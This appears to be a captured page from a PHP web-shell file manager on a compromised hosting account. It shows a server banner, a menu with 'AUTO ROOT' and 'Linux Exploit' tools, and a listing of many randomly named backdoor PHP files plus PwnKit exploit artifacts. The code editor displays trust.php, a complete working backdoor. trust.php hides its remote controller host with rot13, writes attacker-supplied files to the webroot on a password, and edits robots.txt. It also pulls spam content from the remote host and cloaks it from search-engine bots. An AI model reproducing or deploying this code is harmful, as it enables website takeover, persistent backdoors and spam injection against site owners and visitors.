Linux box5428.bluehost.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.216.200 | : 18.190.28.144
Cant Read [ /etc/named.conf ]
revieyk1
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
home3 /
revieyk1 /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
354892
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
brandkings
[ DIR ]
drwxr-x---
cache
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
situsgacor
[ DIR ]
drwxr-xr-x
.htaccess
248
B
-rw-r--r--
.htaccess.phpupgrader.9f3a649c
248
B
-rw-r--r--
.htaccess.phpupgrader.initial
248
B
-rw-r--r--
MgRxQHzkqhG.php
166.77
KB
-rw-r--r--
admin-ajax.php
3.95
KB
-rw-r--r--
admin.php
3.84
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
afcfris.php
3.61
KB
-rw-r--r--
ayk.php
329
B
-rw-r--r--
bRqMLOygWE.php
24.96
KB
-rw-r--r--
bromdpyk.php
14.73
KB
-rw-r--r--
bs.php
147.03
KB
-rw-r--r--
bs.php7
149.12
KB
-rw-r--r--
bu.PhP7
136.81
KB
-rw-r--r--
bu.php
136.81
KB
-rw-r--r--
checkbex.php
57.64
KB
-rw-r--r--
chosen.php
13.01
KB
-rw-r--r--
class-IXR-date.php
16.08
KB
-rw-r--r--
cong.php
14.9
KB
-rw-r--r--
dr.php
1.07
KB
-rw-r--r--
error_log
485.51
KB
-rw-r--r--
frWasCtEHyG.php
43.96
KB
-rw-r--r--
geju.php
181
B
-rw-r--r--
hjfchahd.php
14.68
KB
-rw-r--r--
index.php
12.55
KB
-r--r--r--
index1.php
5.71
KB
-rw-r--r--
ipZHdmsFrcI.php
43.95
KB
-rw-r--r--
license.PhP7
34.16
KB
-rw-r--r--
m.PhP7
104.72
KB
-rw-r--r--
m.php
104.72
KB
-rw-r--r--
mailer.php
104.72
KB
-rw-r--r--
mxfdwldr.php
15.22
KB
-rw-r--r--
nsts.PhP7
247.99
KB
-rw-r--r--
nsts.php
247.99
KB
-rw-r--r--
online.php
5.71
KB
-rw-r--r--
options.php
3.68
KB
-rw-r--r--
pIWJxZ7OuwM.php
38.68
KB
-rw-r--r--
profile.php
4.32
KB
-rw-r--r--
prosellers.PhP7
114.41
KB
-rw-r--r--
prosellers.php
114.41
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
rAuE1goRJxi.php
51.78
KB
-rw-r--r--
rc.php
34.16
KB
-rw-r--r--
rcc.PHP
34.16
KB
-rw-r--r--
simple.php
25.31
KB
-rw-r--r--
style.php
13.36
KB
-rw-r--r--
sz4PBvFcCXa.php
169.05
KB
-rw-r--r--
test1.php
490
B
-rw-r--r--
theme-insmzeh.php
338
B
-rw-r--r--
theme-insuwis.php
338
B
-rw-r--r--
themes.php
3.83
KB
-rw-r--r--
todo.php
5.71
KB
-rw-r--r--
trust.php
7.33
KB
-rw-r--r--
version.php
93
B
-rw-r--r--
vfrtaycq.php
15.22
KB
-rw-r--r--
wSCQ6fzuTgO.php
51.32
KB
-rw-r--r--
wp-admin.php
35.8
KB
-rw-r--r--
wp-diff.PhP7
34.16
KB
-rw-r--r--
wp-gsojdk.php
19.06
KB
-rw-r--r--
wp-info.php
6.71
KB
-rw-r--r--
wp-jfghbr.php
19.06
KB
-rw-r--r--
wp-login.php
3.67
KB
-rw-r--r--
wp-term.php
2.87
KB
-rw-r--r--
wp-ver.php
300
B
-rw-r--r--
zfcpvfjtm.php
75.71
KB
-rw-r--r--
zgsvwcmp.php
164.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : trust.php
<?php @set_time_limit(3600); @ignore_user_abort(1); $xmlname = '%7A%6A%73%68%65%6B%6A%2E%6C%66%68%61%65%76%66%72%72%61%2E%6B%6C%6D'; $http_web = 'http'; if (is_https()) { $http = 'https'; } else { $http = 'http'; } $duri_tmp = drequest_uri(); if ($duri_tmp == ''){ $duri_tmp = '/'; } $duri = urlencode($duri_tmp); function drequest_uri() { if (isset($_SERVER['REQUEST_URI'])) { $duri = $_SERVER['REQUEST_URI']; } else { if (isset($_SERVER['argv'])) { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; } else { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $duri; } $goweb = str_rot13(urldecode($xmlname)); function is_https() { if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { return true; } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return true; } return false; } $host = $_SERVER['HTTP_HOST']; $lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; $lang = urlencode($lang); $urlshang = ''; if (isset($_SERVER['HTTP_REFERER'])) { $urlshang = $_SERVER['HTTP_REFERER']; $urlshang = urlencode($urlshang); } $password = sha1(sha1(@$_REQUEST['pd'])); if ($password == 'f75fd5acd36a7fbd1e219b19881a5348bfc66e79') { $add_content = @$_REQUEST['mapname']; $action = @$_REQUEST['action']; if (isset($_SERVER['DOCUMENT_ROOT'])) { $path = $_SERVER['DOCUMENT_ROOT']; } else { $path = dirname(__FILE__); } if (!$action) { $action = 'put'; } if ($action == 'put') { if (strstr($add_content, '.xml')) { $map_path = $path. '/sitemap.xml'; if (is_file($map_path)) { @unlink($map_path); } $file_path = $path . '/robots.txt'; if (file_exists($file_path)) { $data = doutdo($file_path); } else { $data = 'User-agent: * Allow: /'; } $sitmap_url = $http . '://' . $host . '/' . $add_content; if (stristr($data, $sitmap_url)) { echo '<br>sitemap already added!<br>'; } else { if (file_put_contents($file_path, trim($data) . "\r\n" . 'Sitemap: '.$sitmap_url)) { echo '<br>ok<br>'; } else { echo '<br>file write false!<br>'; } } } else { echo '<br>sitemap name false!<br>'; } if (strstr($add_content, '.p' . 'hp')) { $a = sha1(sha1(@$_REQUEST['a'])); $b = sha1(sha1(@$_REQUEST['b'])); if ($a == doutdo($http_web . '://' . $goweb . '/a.p' . 'hp') || $b == 'f8f0dae804368c0334e22d9dcb70d3c7bbfa9635') { $dstr = @$_REQUEST['dstr']; if (file_put_contents($path . '/' . $add_content, $dstr)) { echo 'ok'; } } } } exit; } if (isset($_SERVER['DOCUMENT_ROOT'])) { $path = $_SERVER['DOCUMENT_ROOT']; } else { $path = dirname(__FILE__); } if(is_dir($path. '/wp-includes')){ $fpath = 'wp-includes/css'; }else{ $fpath = 'css'; } $dpath = $path. '/'.$fpath; if(substr($host,0,4)=='www.'){ $host_nw = substr($host, 4); }else{ $host_nw = $host; } $cssn = str_rot13(substr($host_nw,0,3).substr($goweb,0,3)).'.css'; $ps = $path. '/'.$fpath.'/'.$cssn; $urlc = $http_web . '://' . $goweb . '/temp/style.css'; function ping_sitemap($url){ $url_arr = explode("\r\n", trim($url)); $return_str = ''; foreach($url_arr as $pingUrl){ $pingRes = doutdo($pingUrl); $ok = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'pingok' : 'error'; $return_str .= $pingUrl . '-- ' . $ok . '<br>'; } return $return_str; } function disbot() { $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']); if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) { return true; } else { return false; } } function doutdo($url) { $file_contents= ''; if(function_exists('curl_init')){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $file_contents = curl_exec($ch); curl_close($ch); } if (!$file_contents) { $file_contents = @file_get_contents($url); } return $file_contents; } function fcss($dpath,$ps,$urlc){ if(is_dir($dpath)){ if(!file_exists($ps)){ @file_put_contents($ps,doutdo($urlc)); } }else{ if(@mkdir($dpath)){ if(!file_exists($ps)){ @file_put_contents($ps,doutdo($urlc)); } } } } if($duri_tmp=='/' || strstr($duri_tmp, 'ewttm')){ fcss($dpath,$ps,$urlc); } if(is_file($ps)){ $web = $http_web . '://' . $goweb . '/indexnew.php?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang. '&css=1'; }else{ $web = $http_web . '://' . $goweb . '/indexnew.php?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang; } $html_content = trim(doutdo($web)); if (!strstr($html_content, 'nobotuseragent')) { if (strstr($html_content, 'okhtmlgetcontent')) { @header("Content-type: text/html; charset=utf-8"); if(file_exists($ps)){ $lcss_str = file_get_contents($ps); $html_content = str_replace("[##linkcss##]", $lcss_str, $html_content); }else{ $html_content = str_replace("[##linkcss##]", '', $html_content); } $html_content = str_replace("okhtmlgetcontent", '', $html_content); echo $html_content; exit(); }else if(strstr($html_content, 'okxmlgetcontent')){ $html_content = str_replace("okxmlgetcontent", '', $html_content); @header("Content-type: text/xml"); echo $html_content; exit(); }else if(strstr($html_content, 'pingxmlgetcontent')){ $html_content = str_replace("pingxmlgetcontent", '', $html_content); fcss($dpath,$ps,$urlc); @header("Content-type: text/html; charset=utf-8"); echo ping_sitemap($html_content); exit(); }else if (strstr($html_content, 'getcontent500page')) { @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if (strstr($html_content, 'getcontent404page')) { @header('HTTP/1.1 404 Not Found'); exit(); }else if (strstr($html_content, 'getcontent301page')) { @header('HTTP/1.1 301 Moved Permanently'); $html_content = str_replace("getcontent301page", '', $html_content); header('Location: ' . $html_content); exit(); } }/* blog D333 */ ?>
Close